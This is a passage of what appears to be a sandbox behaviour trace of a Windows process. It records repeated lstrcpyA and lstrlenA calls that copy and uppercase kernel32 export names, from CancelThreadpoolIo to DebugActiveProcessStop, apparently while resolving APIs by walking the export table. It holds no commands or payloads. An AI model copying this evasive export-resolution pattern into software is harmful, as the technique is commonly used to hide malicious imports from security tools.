lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.770] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.770] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.770] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.770] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.770] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.770] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.770] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.770] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.770] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.770] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.770] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.770] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.770] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.770] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.770] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.770] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.770] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.770] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.771] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.771] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.771] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.771] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.771] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.771] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.771] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.771] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.771] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.771] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.771] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.771] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.771] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.771] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.771] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.771] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.771] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.771] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.771] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.771] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.772] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.772] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.772] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.772] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.772] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.772] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.772] lstrlenA (lpString="COPYFILEA") returned 9 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.772] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.772] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.772] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.772] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.772] lstrlenA (lpString="COPYFILEW") returned 9 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.772] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.772] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.772] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.772] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.772] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.772] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.772] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.772] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.773] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.773] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.773] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.773] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.773] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.773] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.773] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.773] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.773] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.773] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.773] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.773] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.773] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.773] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.773] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.773] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.773] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.773] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.773] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.773] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.773] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.774] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.774] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.774] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.774] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.774] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.774] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.774] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.774] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.774] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.774] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.774] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.774] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.774] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.774] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.774] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.774] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.774] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.774] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.774] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.774] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.775] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.775] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.775] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.775] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.775] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.775] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.775] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.775] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.775] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.775] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.775] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.775] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.775] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.775] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.775] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.775] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.775] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.775] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.775] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.775] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.776] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.776] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.776] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.776] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.776] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.776] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.776] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.776] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.776] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.776] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.776] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.776] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.776] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.776] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.776] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.776] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 